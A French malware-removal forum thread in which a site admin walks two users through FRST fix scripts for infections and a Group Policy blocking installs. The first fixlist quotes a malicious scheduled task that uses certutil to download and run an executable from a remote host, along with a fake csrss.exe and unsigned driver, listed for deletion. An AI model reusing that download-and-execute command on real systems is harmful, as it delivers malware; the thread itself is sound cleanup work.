infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

Avatar de l’utilisateur
SophieSamb
Messages : 2
Inscription : 02 août 2019 05:36

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par SophieSamb »

bonsoir,vraiment merci beaucoup,mon google chrome accepte de s'installer et je suis en train de faire des mises à jour comme vous m'avez indiquer
Alors j'a refais le scan et voici ce qu'il a donné:
https://pjjoint.malekal.com/files.php?i ... 10d6s12r10
https://pjjoint.malekal.com/files.php?i ... n6f9b10m12
https://pjjoint.malekal.com/files.php?i ... 13e14r14r8
cordialement

Malekal_morte
Site Admin
Site Admin
Messages : 99465
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte »

ok tu peux donner le rapport de correction, car j'ai l'impression qu'elle na pas été faites.


Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-1562485281-2408517061-278138858-1001\...\Run: [Akamai NetSession Interface] => C:\Users\DELL\AppData\Local\Akamai\netsession_win.exe [4586456 2018-04-17] (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
HKU\S-1-5-21-1562485281-2408517061-278138858-1001\...\Run: [WispySnow] => C:\WINDOWS\rss\csrss.exe [4553728 2019-01-30] () [Fichier non signé] <==== ATTENTION
Task: {1B74CE91-07AA-4F92-8F91-ADDDAFD65C22} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://beguest.xyz/app/app.exe C:\Users\DELL-SOPHIE\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\DELL-SOPHIE\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {49E6C772-321F-4F29-A61C-263C1661637E} - System32\Tasks\OInstall => C:\WINDOWS\OInstall.exe [8627544 2018-05-06] (WZTeam -> ) [Fichier non signé]
Task: {EB6EEA6B-62E6-454B-809A-D0F69E561E20} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4553728 2019-01-30] () [Fichier non signé] <==== ATTENTION
R1 C4BF1092E4A2; C:\WINDOWS\C4BF1092E4A2.sys [621928 2019-01-30] (韵羽健康管理咨询(上海)有限公司 -> VideoDriver) <==== ATTENTION
C:\Windows\rss\csrss.exe
C:\WINDOWS\C4BF1092E4A2.sys
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Avatar de l’utilisateur
ThomasPerez
newbie
newbie
Messages : 8
Inscription : 25 déc. 2019 19:01

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par ThomasPerez »

Bonjour,

Je rencontre le même problème sur mon pc. Je viens de changer d'antivirus, et j'ai oublié de désinstaller l'ancien avant d'installer le nouveau (Kaspersky). Visiblement il doit y avaoir aussi d'autres problèmes.

Les symptômes actuels : je n'arrive pas à installer google drive et le message suivant s'affiche : "Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation"


Voici le lien vers mes rapports FRST:

https://pjjoint.malekal.com/files.php?i ... 9f11m15x67
https://pjjoint.malekal.com/files.php?i ... v1312t6j14


Merci pour votre aide, c'est la première fois que je m'adresse à un forum de ce style.

Malekal_morte
Site Admin
Site Admin
Messages : 99465
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte »

Salut,

Quel antivirus car je ne vois que Kaspersy ?

A désinstaller :
CCleaner
CyberLink
PS : CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Si tu veux le garder, désactive la surveillance de CCleaner, inutile, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : [https://www.malekal.com/supprimer-cclea ... e-windows/]
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Avatar de l’utilisateur
ThomasPerez
newbie
newbie
Messages : 8
Inscription : 25 déc. 2019 19:01

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par ThomasPerez »

j'avais malware et avast
pour ccleaner je ne pense pas avoir la dernière version du coup je n'ai pas toutes les options décrites dans ton lien. Et la case démarrer ccleaner avec le démarrage de windows est désactivée.

As tu une idée d'où peut venir mon problème pour la réinstallation de google drive ?

Je suis en train par ailleurs de tout désinfecter suivant ton tutoriel tranquillement.

Malekal_morte
Site Admin
Site Admin
Messages : 99465
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte »

ok, essaye ça pour voir.

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
End:
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Avatar de l’utilisateur
ThomasPerez
newbie
newbie
Messages : 8
Inscription : 25 déc. 2019 19:01

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par ThomasPerez »

Bonjour,

Merci encore pour ton aide.

Voici ce que FRST me donne :

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 25-12-2019
Exécuté par Thomas (26-12-2019 11:02:52) Run:1
Exécuté depuis C:\Users\Thomas\Desktop\antivirus et nettoyage
Profils chargés: Thomas (Profils disponibles: Thomas)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************

*****************


==== Fin de Fixlog 11:02:52 ====


A priori j'avais toujours Googledrive (sauvegarde et synchronisation) d'installé mais une version plus à jour depuis longtemps. Quand j'essaye de le mettre à jour j'ai un message d'erreur nouveau maintenant : erreur 0x8004070c

Si tu as une solution je suis évidemment preneur. Et merci encore, ton tuto pour nettoyer est super bien fait, et je vois déjà la différence.

Malekal_morte
Site Admin
Site Admin
Messages : 99465
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte »

La correction est vide.
FRST n'est pas sur le bureau.


Place le programme FRST sur le bureau
ouvre le bloc-note
colle le script donné plus haut
enregistre le fichier sur le bureau sous le nom de fixlist.txt
Relance FRST puis Corriger.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Avatar de l’utilisateur
ThomasPerez
newbie
newbie
Messages : 8
Inscription : 25 déc. 2019 19:01

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par ThomasPerez »

Ooooops désolé je l'ai déplacé hier sans y penser.

Après avoir tout remis sur le bureau et fais comme tu l'as écris (je crois) : voici le fixlog que j'obtiens :


Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 25-12-2019
Exécuté par Thomas (26-12-2019 11:39:01) Run:2
Exécuté depuis C:\Users\Thomas\Desktop
Profils chargés: Thomas (Profils disponibles: Thomas)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CODE : TOUT SÉLECTIONNER

Start:
CloseProcesses:
CreateRestorePoint:
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
End:
*****************

CODE : TOUT SÉLECTIONNER => Erreur: Pas de correction automatique trouvée pour cet élément.
Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
HKLM\SOFTWARE\Policies\Google => supprimé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès
"HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-3411274728-3849860818-3660332583-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-3411274728-3849860818-3660332583-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 7359938 B
Java, Flash, Steam htmlcache => 541 B
Windows/system/drivers => 43785671 B
Edge => 0 B
Chrome => 140356996 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 42339259 B
systemprofile32 => 42405615 B
LocalService => 42405615 B
NetworkService => 409938014 B
UpdatusUser => 409938014 B
Thomas => 613358770 B

RecycleBin => 5089524 B
EmptyTemp: => 1.6 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 11:42:34 ====

Avatar de l’utilisateur
ThomasPerez
newbie
newbie
Messages : 8
Inscription : 25 déc. 2019 19:01

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par ThomasPerez »

J'ai fait le boulet. Voici le bon fixlog apres avoir bien enregistré le fixlist


Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 25-12-2019
Exécuté par Thomas (26-12-2019 13:09:27) Run:3
Exécuté depuis C:\Users\Thomas\Desktop
Profils chargés: Thomas (Profils disponibles: Thomas)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CODE : TOUT SÉLECTIONNER

Start:
CloseProcesses:
CreateRestorePoint:
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
End:
*****************

CODE : TOUT SÉLECTIONNER => Erreur: Pas de correction automatique trouvée pour cet élément.
Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
HKLM\SOFTWARE\Policies\Google => non trouvé(e)
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-3411274728-3849860818-3660332583-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => supprimé(es) avec succès
"HKU\S-1-5-21-3411274728-3849860818-3660332583-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 5267081 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 2720 B
Edge => 0 B
Chrome => 40751585 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 0 B
UpdatusUser => 0 B
Thomas => 81284250 B

RecycleBin => 2541 B
EmptyTemp: => 129.4 MB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 13:11:58 ====

Malekal_morte
Site Admin
Site Admin
Messages : 99465
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte »

Ca avait l'air déjà d'avoir été supprimé :
HKLM\SOFTWARE\Policies\Google => non trouvé(e)
Toujours le message à l'installation de Google Chrome ?
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Avatar de l’utilisateur
ThomasPerez
newbie
newbie
Messages : 8
Inscription : 25 déc. 2019 19:01

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par ThomasPerez »

A priori google drive a réussi à se mettre à jour si j'ai bien compris. Un grand merci.

Comme à chaque problème résolu cela soulève de nouveaux problèmes : il m'a supprimé des dossiers complets sur google drive durantl'opération. Je ne sais pas pourquoi, j'ai réussi à les repêcher dans la poubelle du drive mais j'ai des doublons et j'ai surtout flippé. Je ne sais pas ce qui s'est passé. Si tu as une idée d'explication possible.

Autre soucis, impossible de réactiver le pare feu windows, et les mises à jour ? C'est normal ou lié ? pour les mises à jour il me met erreur 80092004


J'y vais pas à pas, l'ordi me semble déjà plus sain mais je me laisse les vacances pour le remettre plus propre et fonctionnel. Gageons qu'avec Kaspersky et un usage plus sage je sois moins embêté.


Merci encore pour tes infos et aide, même si je ne comprends pas tout.

Malekal_morte
Site Admin
Site Admin
Messages : 99465
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte »

Non pas normal,

Installe la mise à jour Windows 1909 manuellement avec l'assistant de mise à jour ou Media Creation tool.
Suis ces tutos pas à pas :Télécharger et installer la mise à jour Windows 10 1909

Vois si ça remet tout d'applomb.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Avatar de l’utilisateur
ThomasPerez
newbie
newbie
Messages : 8
Inscription : 25 déc. 2019 19:01

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par ThomasPerez »

Hum, je suis sur Windows 7 familiale premium. Du coup j'imagine que ce n'est pas la mise à jour à installer non ?

Malekal_morte
Site Admin
Site Admin
Messages : 99465
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte »

ha oui mince j'avais dû regarder les rapports de la première personne.
Tu as Kaspersky Antivirus.
Je ne pense pas qu'il désactive le pare-feu de Windows.

Peut-être réparer Windows 7 : Comment réparer Windows 7 sans perte de données
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.

Répondre

Revenir à « Supprimer/Desinfecter les virus (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »